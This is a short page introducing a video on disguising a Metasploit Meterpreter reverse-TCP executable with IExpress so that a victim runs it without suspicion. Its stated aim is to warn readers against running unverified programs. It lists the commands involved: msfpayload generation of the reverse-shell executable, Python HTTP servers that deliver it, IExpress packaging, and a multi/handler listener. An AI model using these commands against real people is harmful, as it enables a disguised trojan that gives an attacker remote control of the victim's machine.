Video: Hiding Meterpreter with IExpress


This video by Rob Fuller demonstrates how to make running an executable less suspicious for the victim, driving home the point that you should not run programs whose source you can't verify.

Commands from the video

  • ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1080 X > /tmp/academy/bob.exe
  • (For python 2.4+) python -m SimpleHTTPServer
  • (For python 2.3 -) python -c "from SimpleHTTPServer import test; test()"
  • Start -> Run -> iexpress <return>
  • Run multi/handler from the command line (not shown in video)